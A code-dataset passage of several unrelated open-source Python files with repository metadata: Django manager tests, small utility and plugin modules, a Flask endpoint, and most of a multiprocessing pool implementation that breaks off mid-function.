as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'django.db.models.manager.Manager')
self.assertEqual(args, ())
self.assertEqual(kwargs, {})
def test_deconstruct_as_manager(self):
mgr = CustomQuerySet.as_manager()
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertTrue(as_manager)
self.assertEqual(qs_path, 'custom_managers.models.CustomQuerySet')
def test_deconstruct_from_queryset(self):
mgr = DeconstructibleCustomManager('a', 'b')
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'custom_managers.models.DeconstructibleCustomManager')
self.assertEqual(args, ('a', 'b',))
self.assertEqual(kwargs, {})
mgr = DeconstructibleCustomManager('x', 'y', c=3, d=4)
as_manager, mgr_path, qs_path, args, kwargs = mgr.deconstruct()
self.assertFalse(as_manager)
self.assertEqual(mgr_path, 'custom_managers.models.DeconstructibleCustomManager')
self.assertEqual(args, ('x', 'y',))
self.assertEqual(kwargs, {'c': 3, 'd': 4})
def test_deconstruct_from_queryset_failing(self):
mgr = CustomManager('arg')
msg = ("Could not find manager BaseCustomManagerFromCustomQuerySet in "
"django.db.models.manager.\n"
"Please note that you need to inherit from managers you "
"dynamically generated with 'from_queryset()'.")
with self.assertRaisesMessage(ValueError, msg):
mgr.deconstruct()
def test_abstract_model_with_custom_manager_name(self):
"""
A custom manager may be defined on an abstract model.
It will be inherited by the abstract model's children.
"""
PersonFromAbstract.abstract_persons.create(objects='Test')
self.assertQuerysetEqual(
PersonFromAbstract.abstract_persons.all(), ["Test"],
lambda c: c.objects,
)
class TestCars(TestCase):
def test_managers(self):
# Each model class gets a "_default_manager" attribute, which is a
# reference to the first manager defined in the class.
Car.cars.create(name="Corvette", mileage=21, top_speed=180)
Car.cars.create(name="Neon", mileage=31, top_speed=100)
self.assertQuerysetEqual(
Car._default_manager.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
Car.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
# alternate manager
self.assertQuerysetEqual(
Car.fast_cars.all(), [
"Corvette",
],
lambda c: c.name
)
# explicit default manager
self.assertQuerysetEqual(
FastCarAsDefault.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
FastCarAsDefault._default_manager.all(), [
"Corvette",
],
lambda c: c.name
)
# explicit base manager
self.assertQuerysetEqual(
FastCarAsBase.cars.order_by("name"), [
"Corvette",
"Neon",
],
lambda c: c.name
)
self.assertQuerysetEqual(
FastCarAsBase._base_manager.all(), [
"Corvette",
],
lambda c: c.name
)
class CustomManagersRegressTestCase(TestCase):
def test_filtered_default_manager(self):
"""Even though the default manager filters out some records,
we must still be able to save (particularly, save by updating
existing records) those filtered instances. This is a
regression test for #8990, #9527"""
related = RelatedModel.objects.create(name="xyzzy")
obj = RestrictedModel.objects.create(name="hidden", related=related)
obj.name = "still hidden"
obj.save()
# If the hidden object wasn't seen during the save process,
# there would now be two objects in the database.
self.assertEqual(RestrictedModel.plain_manager.count(), 1)
def test_refresh_from_db_when_default_manager_filters(self):
"""
Model.refresh_from_db() works for instances hidden by the default
manager.
"""
book = Book._base_manager.create(is_published=False)
Book._base_manager.filter(pk=book.pk).update(title='Hi')
book.refresh_from_db()
self.assertEqual(book.title, 'Hi')
def test_save_clears_annotations_from_base_manager(self):
"""Model.save() clears annotations from the base manager."""
self.assertEqual(Book._meta.base_manager.name, 'annotated_objects')
book = Book.annotated_objects.create(title='Hunting')
Person.objects.create(
first_name='Bugs', last_name='Bunny', fun=True,
favorite_book=book, favorite_thing_id=1,
)
book = Book.annotated_objects.first()
self.assertEqual(book.favorite_avg, 1) # Annotation from the manager.
book.title = 'New Hunting'
# save() fails if annotations that involve related fields aren't
# cleared before the update query.
book.save()
self.assertEqual(Book.annotated_objects.first().title, 'New Hunting')
def test_delete_related_on_filtered_manager(self):
"""Deleting related objects should also not be distracted by a
restricted manager on the related object. This is a regression
test for #2698."""
related = RelatedModel.objects.create(name="xyzzy")
for name, public in (('one', True), ('two', False), ('three', False)):
RestrictedModel.objects.create(name=name, is_public=public, related=related)
obj = RelatedModel.objects.get(name="xyzzy")
obj.delete()
# All of the RestrictedModel instances should have been
# deleted, since they *all* pointed to the RelatedModel. If
# the default manager is used, only the public one will be
# deleted.
self.assertEqual(len(RestrictedModel.plain_manager.all()), 0)
def test_delete_one_to_one_manager(self):
# The same test case as the last one, but for one-to-one
# models, which are implemented slightly different internally,
# so it's a different code path.
obj = RelatedModel.objects.create(name="xyzzy")
OneToOneRestrictedModel.objects.create(name="foo", is_public=False, related=obj)
obj = RelatedModel.objects.get(name="xyzzy")
obj.delete()
self.assertEqual(len(OneToOneRestrictedModel.plain_manager.all()), 0)
def test_queryset_with_custom_init(self):
"""
BaseManager.get_queryset() should use kwargs rather than args to allow
custom kwargs (#24911).
"""
qs_custom = Person.custom_init_queryset_manager.all()
qs_default = Person.objects.all()
self.assertQuerysetEqual(qs_custom, qs_default)
|
nesdis/djongo
|
tests/django_tests/tests/v22/tests/custom_managers/tests.py
|
Python
|
agpl-3.0
| 25,648 | 0.001716 |
def hello_world():
"Function that says hello."
print("Hello, world!")
|
evanmiltenburg/python-for-text-analysis
|
Extra_Material/Examples/Separate_Files/main_dir_script.py
|
Python
|
apache-2.0
| 78 | 0 |
#!/usr/bin/env python
from runtest import TestBase
class TestCase(TestBase):
def __init__(self):
TestBase.__init__(self, 'abc', """
# DURATION TID FUNCTION
62.202 us [28141] | __cxa_atexit();
[28141] | main() {
[28141] | a() {
[28141] | b() {
[28141] | c() {
0.753 us [28141] | getpid();
1.430 us [28141] | } /* c */
1.915 us [28141] | } /* b */
2.405 us [28141] | } /* a */
3.005 us [28141] | } /* main */
""")
|
namhyung/uftrace
|
tests/t001_basic.py
|
Python
|
gpl-2.0
| 530 | 0.001887 |
# -*- coding: utf8 -*-
"""
The ``dbs`` module
===================
Contain all functions to access to main site db or any sql-lite db, in a secure way
"""
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.sql import join
__all__ = ['join', 'create_engine_session', 'auto_map_orm']
def create_engine_session(engine_url, echo=True):
"""
Create a sql session
engine is the rfc1738 compliant url
http://docs.sqlalchemy.org/en/latest/dialects/index.html
:param engine_url:
:param echo:
:return:
"""
engine = sqlalchemy.create_engine(engine_url, echo=echo)
session_class = sessionmaker(bind=engine)
session = session_class()
return engine, session
def auto_map_orm(engine):
base_class = automap_base()
base_class.prepare(engine, reflect=True)
|
salas106/lahorie
|
lahorie/utils/sql.py
|
Python
|
mit
| 886 | 0.002257 |
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible import __version__
from ansible.errors import AnsibleError
from distutils.version import LooseVersion
from operator import eq, ge, gt
from sys import version_info
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
version_requirement = '2.5.0.0'
version_tested_max = '2.7.5'
python3_required_version = '2.5.3'
if version_info[0] == 3 and not ge(LooseVersion(__version__), LooseVersion(python3_required_version)):
raise AnsibleError(('Ansible >= {} is required when using Python 3.\n'
'Either downgrade to Python 2 or update your Ansible version to {}.').format(python3_required_version, python3_required_version))
if not ge(LooseVersion(__version__), LooseVersion(version_requirement)):
raise AnsibleError(('Trellis no longer supports Ansible {}.\n'
'Please upgrade to Ansible {} or higher.').format(__version__, version_requirement))
elif gt(LooseVersion(__version__), LooseVersion(version_tested_max)):
display.warning(u'You Ansible version is {} but this version of Trellis has only been tested for '
u'compatability with Ansible {} -> {}. It is advisable to check for Trellis updates or '
u'downgrade your Ansible version.'.format(__version__, version_requirement, version_tested_max))
if eq(LooseVersion(__version__), LooseVersion('2.5.0')):
display.warning(u'You Ansible version is {}. Consider upgrading your Ansible version to avoid '
u'erroneous warnings such as `Removed restricted key from module data...`'.format(__version__))
# Import BaseVarsPlugin after Ansible version check.
# Otherwise import error for Ansible versions older than 2.4 would prevent display of version check message.
from ansible.plugins.vars import BaseVarsPlugin
class VarsModule(BaseVarsPlugin):
def get_vars(self, loader, path, entities, cache=True):
return {}
|
jeffstieler/bedrock-ansible
|
lib/trellis/plugins/vars/version.py
|
Python
|
mit
| 2,048 | 0.007324 |
from gasistafelice.rest.views.blocks.base import BlockWithList
from django.utils.translation import ugettext as _, ugettext_lazy as _lazy
#------------------------------------------------------------------------------#
# #
#------------------------------------------------------------------------------#
class Block(BlockWithList):
BLOCK_NAME = "account_state"
BLOCK_DESCRIPTION = _("Economic state")
BLOCK_VALID_RESOURCE_TYPES = ["gas", "site"]
def _get_resource_list(self, request):
return request.resource.accounts
# TODO fero CHECK
# THIS IS USEFUL FOR USER ACTIONS: add/update/delete
# # Calculate allowed user actions
# #
# user_actions = []
#
# if settings.CAN_CHANGE_CONFIGURATION_VIA_WEB == True:
# user = request.user
# if can_write_to_resource(user,res):
# if resource_type in ['container', 'node', 'target', 'measure']:
#
# if (resource_type in ['target', 'measure']):
# if res.suspended:
# user_actions.append('resume')
# else:
# user_actions.append('suspend')
# else:
# user_actions.append('resume')
# user_actions.append('suspend')
# TODO fero CHECK
# THIS IS USEFUL FOR ADD/REMOVE NEW GAS
# elif args == "new_note":
# return self.add_new_note(request, resource_type, resource_id)
# elif args == "remove_note":
# return self.remove_note(request, resource_type, resource_id)
#------------------------------------------------------------------------------#
# #
#------------------------------------------------------------------------------#
# TODO fero CHECK
# THIS IS USEFUL FOR ADD/REMOVE NEW GAS
# def add_new_note(self,request, resource_type, resource_id):
# resource = request.resource
#
# if request.POST:
#
# #title = request.REQUEST.get('title');
# body = request.REQUEST.get('body');
#
# new_comment = Comment(content_object = resource
# ,site = DjangoSite.objects.all()[0]
# ,user = request.user
# ,user_name = request.user.username
# ,user_email = request.user.email
# ,user_url = ''
# ,comment = body
# ,ip_address = None
# ,is_public = True
# ,is_removed = False
# )
#
# new_comment.save()
#
# return HttpResponse('<div id="response" resource_type="%s" resource_id="%s" class="success">ok</div>' % (resource.resource_type, resource.id))
#
# return HttpResponse('')
#
# #------------------------------------------------------------------------------#
# # #
# #------------------------------------------------------------------------------#
#
# def remove_note(self, request, resource_type, resource_id):
#
# resource = request.resource
#
# note_id = request.REQUEST.get('note_id')
#
# note = Comment.objects.get(id=note_id)
# note.delete()
#
# return HttpResponse('<div id="response" resource_type="%s" resource_id="%s" class="success">ok</div>' % (resource.resource_type, resource.id))
|
OrlyMar/gasistafelice
|
gasistafelice/rest/views/blocks/account_state.py
|
Python
|
agpl-3.0
| 3,887 | 0.009262 |
import unittest
import os
from test.aiml_tests.client import TestClient
from programy.config.brain import BrainFileConfiguration
class BasicTestClient(TestClient):
def __init__(self):
TestClient.__init__(self)
def load_configuration(self, arguments):
super(BasicTestClient, self).load_configuration(arguments)
self.configuration.brain_configuration._aiml_files = BrainFileConfiguration(files=os.path.dirname(__file__))
self.configuration.brain_configuration._person = os.path.dirname(__file__)+"/person.txt"
class PersonAIMLTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
PersonAIMLTests.test_client = BasicTestClient()
def test_person(self):
response = PersonAIMLTests.test_client.bot.ask_question("test", "TEST PERSON")
self.assertIsNotNone(response)
self.assertEqual(response, "This is your2 cat")
|
dkamotsky/program-y
|
src/test/aiml_tests/person_tests/test_person_aiml.py
|
Python
|
mit
| 904 | 0.005531 |
#!/usr/bin/python
########################################################################
# 1 August 2014
# Patrick Lombard, Centre for Stem Stem Research
# Core Bioinformatics Group
# University of Cambridge
# All right reserved.
########################################################################
import pychiptools.call_diff_bind
pychiptools.call_diff_bind.main()
|
pdl30/pychiptools
|
scripts/pychip_diff_bind.py
|
Python
|
gpl-2.0
| 376 | 0 |
from flask import request
from flask_restplus import Resource
from skf.api.security import security_headers, validate_privilege
from skf.api.checklist_category.business import update_checklist_category
from skf.api.checklist_category.serializers import checklist_type_update, message
from skf.api.kb.parsers import authorization
from skf.api.restplus import api
from skf.api.security import log, val_num, val_alpha, val_alpha_num, val_alpha_num_special
ns = api.namespace('checklist_category', description='Operations related to checklist items')
@ns.route('/update/<int:id>')
@api.doc(params={'id': 'The checklist category id'})
@api.response(404, 'Validation error', message)
class ChecklistCategoryUpdate(Resource):
@api.expect(authorization, checklist_type_update)
@api.response(400, 'No results found', message)
def put(self, id):
"""
Update a checklist type.
* Privileges required: **edit**
"""
data = request.json
val_num(id)
val_alpha_num_special(data.get('name'))
val_alpha_num_special(data.get('description'))
validate_privilege(self, 'edit')
result = update_checklist_category(id, data)
return result, 200, security_headers()
|
blabla1337/skf-flask
|
skf/api/checklist_category/endpoints/checklist_category_update.py
|
Python
|
agpl-3.0
| 1,240 | 0.003226 |
# -*- coding: utf-8 -*-
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
#
# Imports
#
import errno
import itertools
import os
import platform
import signal
import sys
import threading
import time
import warnings
from collections import deque
from functools import partial
from . import cpu_count, get_context
from . import util
from .common import pickle_loads, reset_signals, restart_state
from .compat import get_errno, send_offset
from .einfo import ExceptionInfo
from .dummy import DummyProcess
from .exceptions import (
CoroStop,
RestartFreqExceeded,
SoftTimeLimitExceeded,
Terminated,
TimeLimitExceeded,
TimeoutError,
WorkerLostError,
)
from .five import Empty, Queue, range, values, reraise, monotonic
from .util import Finalize, debug
PY3 = sys.version_info[0] == 3
if platform.system() == 'Windows': # pragma: no cover
# On Windows os.kill calls TerminateProcess which cannot be
# handled by # any process, so this is needed to terminate the task
# *and its children* (if any).
from ._win import kill_processtree as _kill # noqa
SIGKILL = signal.SIGTERM
else:
from os import kill as _kill # noqa
SIGKILL = signal.SIGKILL
try:
TIMEOUT_MAX = threading.TIMEOUT_MAX
except AttributeError: # pragma: no cover
TIMEOUT_MAX = 1e10 # noqa
if sys.version_info >= (3, 3):
_Semaphore = threading.Semaphore
else:
# Semaphore is a factory function pointing to _Semaphore
_Semaphore = threading._Semaphore # noqa
SIGMAP = dict(
(getattr(signal, n), n) for n in dir(signal) if n.startswith('SIG')
)
#
# Constants representing the state of a pool
#
RUN = 0
CLOSE = 1
TERMINATE = 2
#
# Constants representing the state of a job
#
ACK = 0
READY = 1
TASK = 2
NACK = 3
DEATH = 4
#
# Exit code constants
#
EX_OK = 0
EX_FAILURE = 1
EX_RECYCLE = 0x9B
# Signal used for soft time limits.
SIG_SOFT_TIMEOUT = getattr(signal, "SIGUSR1", None)
#
# Miscellaneous
#
LOST_WORKER_TIMEOUT = 10.0
EX_OK = getattr(os, "EX_OK", 0)
job_counter = itertools.count()
Lock = threading.Lock
def _get_send_offset(connection):
try:
native = connection.send_offset
except AttributeError:
native = None
if native is None:
return partial(send_offset, connection.fileno())
return native
def human_status(status):
if (status or 0) < 0:
try:
return 'signal {0} ({1})'.format(-status, SIGMAP[-status])
except KeyError:
return 'signal {0}'.format(-status)
return 'exitcode {0}'.format(status)
def mapstar(args):
return list(map(*args))
def starmapstar(args):
return list(itertools.starmap(args[0], args[1]))
def error(msg, *args, **kwargs):
if util._logger:
util._logger.error(msg, *args, **kwargs)
def stop_if_not_current(thread, timeout=None):
if thread is not threading.current_thread():
thread.stop(timeout)
class LaxBoundedSemaphore(_Semaphore):
"""Semaphore that checks that # release is <= # acquires,
but ignores if # releases >= value."""
def __init__(self, value=1, verbose=None):
if PY3:
_Semaphore.__init__(self, value)
else:
_Semaphore.__init__(self, value, verbose)
self._initial_value = value
def grow(self):
if PY3:
cond = self._cond
else:
cond = self._Semaphore__cond
with cond:
self._initial_value += 1
self._Semaphore__value += 1
cond.notify()
def shrink(self):
self._initial_value -= 1
self.acquire()
if PY3:
def release(self):
cond = self._cond
with cond:
if self._value < self._initial_value:
self._value += 1
cond.notify_all()
def clear(self):
while self._value < self._initial_value:
_Semaphore.release(self)
else:
def release(self): # noqa
cond = self._Semaphore__cond
with cond:
if self._Semaphore__value < self._initial_value:
self._Semaphore__value += 1
cond.notifyAll()
def clear(self): # noqa
while self._Semaphore__value < self._initial_value:
_Semaphore.release(self)
#
# Exceptions
#
class MaybeEncodingError(Exception):
"""Wraps possible unpickleable errors, so they can be
safely sent through the socket."""
def __init__(self, exc, value):
self.exc = repr(exc)
self.value = repr(value)
super(MaybeEncodingError, self).__init__(self.exc, self.value)
def __repr__(self):
return "<MaybeEncodingError: %s>" % str(self)
def __str__(self):
return "Error sending result: '%r'. Reason: '%r'." % (
self.value, self.exc)
class WorkersJoined(Exception):
"""All workers have terminated."""
def soft_timeout_sighandler(signum, frame):
raise SoftTimeLimitExceeded()
#
# Code run by worker processes
#
class Worker(object):
_controlled_termination = False
_job_terminated = False
def __init__(self, inq, outq, synq=None, initializer=None, initargs=(),
maxtasks=None, sentinel=None, on_exit=None,
sigprotection=True, wrap_exception=True):
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
self.initializer = initializer
self.initargs = initargs
self.maxtasks = maxtasks
self._shutdown = sentinel
self.on_exit = on_exit
self.sigprotection = sigprotection
self.inq, self.outq, self.synq = inq, outq, synq
self.wrap_exception = wrap_exception # XXX cannot disable yet
self.contribute_to_object(self)
def contribute_to_object(self, obj):
obj.inq, obj.outq, obj.synq = self.inq, self.outq, self.synq
obj.inqW_fd = self.inq._writer.fileno() # inqueue write fd
obj.outqR_fd = self.outq._reader.fileno() # outqueue read fd
if self.synq:
obj.synqR_fd = self.synq._reader.fileno() # synqueue read fd
obj.synqW_fd = self.synq._writer.fileno() # synqueue write fd
obj.send_syn_offset = _get_send_offset(self.synq._writer)
else:
obj.synqR_fd = obj.synqW_fd = obj._send_syn_offset = None
obj._quick_put = self.inq._writer.send
obj._quick_get = self.outq._reader.recv
obj.send_job_offset = _get_send_offset(self.inq._writer)
return obj
def __reduce__(self):
return self.__class__, (
self.inq, self.outq, self.synq, self.initializer,
self.initargs, self.maxtasks, self._shutdown, self.on_exit,
self.sigprotection, self.wrap_exception,
)
def __call__(self):
_exit = sys.exit
_exitcode = [None]
def exit(status=None):
_exitcode[0] = status
return _exit()
sys.exit = exit
pid = os.getpid()
self._make_child_methods()
self.after_fork()
self.on_loop_start(pid=pid) # callback on loop start
try:
sys.exit(self.workloop(pid=pid))
except Exception as exc:
error('Pool process %r error: %r', self, exc, exc_info=1)
self._do_exit(pid, _exitcode[0], exc)
finally:
self._do_exit(pid, _exitcode[0], None)
def _do_exit(self, pid, exitcode, exc=None):
if exitcode is None:
exitcode = EX_FAILURE if exc else EX_OK
if self.on_exit is not None:
self.on_exit(pid, exitcode)
if sys.platform != 'win32':
try:
self.outq.put((DEATH, (pid, exitcode)))
time.sleep(1)
finally:
os._exit(exitcode)
else:
os._exit(exitcode)
def on_loop_start(self, pid):
pass
def terminate_controlled(self):
self._controlled_termination = True
self.terminate()
def prepare_result(self, result):
return result
def workloop(self, debug=debug, now=monotonic, pid=None):
pid = pid or os.getpid()
put = self.outq.put
inqW_fd = self.inqW_fd
synqW_fd = self.synqW_fd
maxtasks = self.maxtasks
prepare_result = self.prepare_result
wait_for_job = self.wait_for_job
_wait_for_syn = self.wait_for_syn
def wait_for_syn(jid):
i = 0
while 1:
if i > 60:
error('!!!WAIT FOR ACK TIMEOUT: job:%r fd:%r!!!',
jid, self.synq._reader.fileno(), exc_info=1)
req = _wait_for_syn()
if req:
type_, args = req
if type_ == NACK:
return False
assert type_ == ACK
return True
i += 1
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
req = wait_for_job()
if req:
type_, args_ = req
assert type_ == TASK
job, i, fun, args, kwargs = args_
put((ACK, (job, i, now(), pid, synqW_fd)))
if _wait_for_syn:
confirm = wait_for_syn(job)
if not confirm:
continue # received NACK
try:
result = (True, prepare_result(fun(*args, **kwargs)))
except Exception:
result = (False, ExceptionInfo())
try:
put((READY, (job, i, result, inqW_fd)))
except Exception as exc:
_, _, tb = sys.exc_info()
try:
wrapped = MaybeEncodingError(exc, result[1])
einfo = ExceptionInfo((
MaybeEncodingError, wrapped, tb,
))
put((READY, (job, i, (False, einfo), inqW_fd)))
finally:
del(tb)
completed += 1
debug('worker exiting after %d tasks', completed)
if maxtasks:
return EX_RECYCLE if completed == maxtasks else EX_FAILURE
return EX_OK
def after_fork(self):
if hasattr(self.inq, '_writer'):
self.inq._writer.close()
if hasattr(self.outq, '_reader'):
self.outq._reader.close()
if self.initializer is not None:
self.initializer(*self.initargs)
# Make sure all exiting signals call finally: blocks.
# This is important for the semaphore to be released.
reset_signals(full=self.sigprotection)
# install signal handler for soft timeouts.
if SIG_SOFT_TIMEOUT is not None:
signal.signal(SIG_SOFT_TIMEOUT, soft_timeout_sighandler)
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
except AttributeError:
pass
def _make_recv_method(self, conn):
get = conn.get
if hasattr(conn, '_reader'):
_poll = conn._reader.poll
if hasattr(conn, 'get_payload') and conn.get_payload:
get_payload = conn.get_payload
def _recv(timeout, loads=pickle_loads):
return True, loads(get_payload())
else:
def _recv(timeout): # noqa
if _poll(timeout):
return True, get()
return False, None
else:
def _recv(timeout): # noqa
try:
return True, get(timeout=timeout)
except Queue.Empty:
return False, None
return _recv
def _make_child_methods(self, loads=pickle_loads):
self.wait_for_job = self._make_protected_receive(self.inq)
self.wait_for_syn = (self._make_protected_receive(self.synq)
if self.synq else None)
def _make_protected_receive(self, conn):
_receive = self._make_recv_method(conn)
should_shutdown = self._shutdown.is_set if self._shutdown else None
def receive(debug=debug):
if should_shutdown and should_shutdown():
debug('worker got sentinel -- exiting')
raise SystemExit(EX_OK)
try:
ready, req = _receive(1.0)
if not ready:
return None
except (EOFError, IOError) as exc:
if get_errno(exc) == errno.EINTR:
return None # interrupted, maybe by gdb
debug('worker got %s -- exiting', type(exc).__name__)
raise SystemExit(EX_FAILURE)
if req is None:
debug('worker got sentinel -- exiting')
raise SystemExit(EX_FAILURE)
return req
return receive
#
# Class representing a process pool
#
class PoolThread(DummyProcess):
def __init__(self, *args, **kwargs):
DummyProcess.__init__(self)
self._state = RUN
self._was_started = False
self.daemon = True
def run(self):
try:
return self.body()
except RestartFreqExceeded as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
_kill(os.getpid(), signal.SIGTERM)
sys.exit()
except Exception as exc:
error("Thread %r crashed: %r", type(self).__name__, exc,
exc_info=1)
os._exit(1)
def start(self, *args, **kwargs):
self._was_started = True
super(PoolThread, self).start(*args, **kwargs)
def on_stop_not_started(self):
pass
def stop(self, timeout=None):
if self._was_started:
self.join(timeout)
return
self.on_stop_not_started()
def terminate(self):
self._state = TERMINATE
def close(self):
self._state = CLOSE
class Supervisor(PoolThread):
def __init__(self, pool):
self.pool = pool
super(Supervisor, self).__init__()
def body(self):
debug('worker handler starting')
time.sleep(0.8)
pool = self.pool
try:
# do a burst at startup to verify that we can start
# our pool processes, and in that time we lower
# the max restart frequency.
prev_state = pool.restart_state
pool.restart_state = restart_state(10 * pool._processes, 1)
for _ in range(10):
if self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.1)
# Keep maintaing workers until the cache gets drained, unless
# the pool is termianted
pool.restart_state = prev_state
while self._state == RUN and pool._state == RUN:
pool._maintain_pool()
time.sleep(0.8)
except RestartFreqExceeded:
pool.close()
pool.join()
raise
debug('worker handler exiting')
class TaskHandler(PoolThread):
def __init__(self, taskqueue, put, outqueue, pool):
self.taskqueue = taskqueue
self.put = put
self.outqueue = outqueue
self.pool = pool
super(TaskHandler, self).__init__()
def body(self):
taskqueue = self.taskqueue
put = self.put
for taskseq, set_length in iter(taskqueue.get, None):
try:
i = -1
for i, task in enumerate(taskseq):
if self._state:
debug('task handler found thread._state != RUN')
break
try:
put(task)
except IOError:
debug('could not put task on queue')
break
else:
if set_length:
debug('doing set_length()')
set_length(i + 1)
continue
break
except Exception as exc:
error('Task Handler ERROR: %r', exc, exc_info=1)
break
else:
debug('task handler got sentinel')
self.tell_others()
def tell_others(self):
outqueue = self.outqueue
put = self.put
pool = self.pool
try:
# tell result handler to finish when cache is empty
debug('task handler sending sentinel to result handler')
outqueue.put(None)
# tell workers there is no more work
debug('task handler sending sentinel to workers')
for p in pool:
put(None)
except IOError:
debug('task handler got IOError when sending sentinels')
debug('task handler exiting')
def on_stop_not_started(self):
self.tell_others()
class TimeoutHandler(PoolThread):
def __init__(self, processes, cache, t_soft, t_hard):
self.processes = processes
self.cache = cache
self.t_soft = t_soft
self.t_hard = t_hard
self._it = None
super(TimeoutHandler, self).__init__()
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self.processes)
if proc.pid == pid
), (None, None))
def on_soft_timeout(self, job):
debug('soft time limit exceeded for %r', job)
process, _index = self._process_by_pid(job._worker_pid)
if not process:
return
# Run timeout callback
job.handle_timeout(soft=True)
try:
_kill(job._worker_pid, SIG_SOFT_TIMEOUT)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
def on_hard_timeout(self, job):
if job.ready():
return
debug('hard time limit exceeded for %r', job)
# Remove from cache and set return value to an exception
try:
raise TimeLimitExceeded(job._timeout)
except TimeLimitExceeded:
job._set(job._job, (False, ExceptionInfo()))
else: # pragma: no cover
pass
# Remove from _pool
process, _index = self._process_by_pid(job._worker_pid)
# Run timeout callback
job.handle_timeout(soft=False)
if process:
self._trywaitkill(process)
def _trywaitkill(self, worker):
debug('timeout: sending TERM to %s', worker._name)
try:
worker.terminate()
except OSError:
pass
else:
if worker._popen.wait(timeout=0.1):
return
debug('timeout: TERM timed-out, now sending KILL to %s', worker._name)
try:
_kill(worker.pid, SIGKILL)
except OSError:
pass
def handle_timeouts(self):
cache = self.cache
t_hard, t_soft = self.t_hard, self.t_soft
dirty = set()
on_soft_timeout = self.on_soft_timeout
on_hard_timeout = self.on_hard_timeout
def _timed_out(start, timeout):
if not start or not timeout:
return False
if monotonic() >= start + timeout:
return True
# Inner-loop
while self._state == RUN:
# Remove dirty items not in cache anymore
if dirty:
dirty = set(k for k in dirty if k in cache)
for i, job in list(cache.items()):
ack_time = job._time_accepted
soft_timeout = job._soft_timeout
if soft_timeout is None:
soft_timeout = t_soft
hard_timeout = job._timeout
if hard_timeout is None:
hard_timeout = t_hard
if _timed_out(ack_time, hard_timeout):
on_hard_timeout(job)
elif i not in dirty and _timed_out(ack_time, soft_timeout):
on_soft_timeout(job)
dirty.add(i)
yield
def body(self):
while self._state == RUN:
try:
for _ in self.handle_timeouts():
time.sleep(1.0) # don't spin
except CoroStop:
break
debug('timeout handler exiting')
def handle_event(self, *args):
if self._it is None:
self._it = self.handle_timeouts()
try:
next(self._it)
except StopIteration:
self._it = None
class ResultHandler(PoolThread):
def __init__(self, outqueue, get, cache, poll,
join_exited_workers, putlock, restart_state,
check_timeouts, on_job_ready):
self.outqueue = outqueue
self.get = get
self.cache = cache
self.poll = poll
self.join_exited_workers = join_exited_workers
self.putlock = putlock
self.restart_state = restart_state
self._it = None
self._shutdown_complete = False
self.check_timeouts = check_timeouts
self.on_job_ready = on_job_ready
self._make_methods()
super(ResultHandler, self).__init__()
def on_stop_not_started(self):
# used when pool started without result handler thread.
self.finish_at_shutdown(handle_timeouts=True)
def _make_methods(self):
cache = self.cache
putlock = self.putlock
restart_state = self.restart_state
on_job_ready = self.on_job_ready
def on_ack(job, i, time_accepted, pid, synqW_fd):
restart_state.R = 0
try:
cache[job]._ack(i, time_accepted, pid, synqW_fd)
except (KeyError, AttributeError):
# Object gone or doesn't support _ack (e.g. IMAPIterator).
pass
def on_ready(job, i, obj, inqW_fd):
if on_job_ready is not None:
on_job_ready(job, i, obj, inqW_fd)
try:
item = cache[job]
except KeyError:
return
if not item.ready():
if putlock is not None:
putlock.release()
try:
item._set(i, obj)
except KeyError:
pass
def on_death(pid, exitcode):
try:
os.kill(pid, signal.SIGTERM)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
state_handlers = self.state_handlers = {
ACK: on_ack, READY: on_ready, DEATH: on_death
}
def on_state_change(task):
state, args = task
try:
state_handlers[state](*args)
except KeyError:
debug("Unknown job state: %s (args=%s)", state, args)
self.on_state_change = on_state_change
def _process_result(self, timeout=1.0):
poll = self.poll
on_state_change = self.on_state_change
while 1:
try:
ready, task = poll(timeout)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
raise CoroStop()
if self._state:
assert self._state == TERMINATE
debug('result handler found thread._state=TERMINATE')
raise CoroStop()
if ready:
if task is None:
debug('result handler got sentinel')
raise CoroStop()
on_state_change(task)
if timeout != 0: # blocking
break
else:
break
yield
def handle_event(self, fileno=None, events=None):
if self._state == RUN:
if self._it is None:
self._it = self._process_result(0) # non-blocking
try:
next(self._it)
except (StopIteration, CoroStop):
self._it = None
def body(self):
debug('result handler starting')
try:
while self._state == RUN:
try:
for _ in self._process_result(1.0): # blocking
pass
except CoroStop:
break
finally:
self.finish_at_shutdown()
def finish_at_shutdown(self, handle_timeouts=False):
self._shutdown_complete = True
get = self.get
outqueue = self.outqueue
cache = self.cache
poll = self.poll
join_exited_workers = self.join_exited_workers
check_timeouts = self.check_timeouts
on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
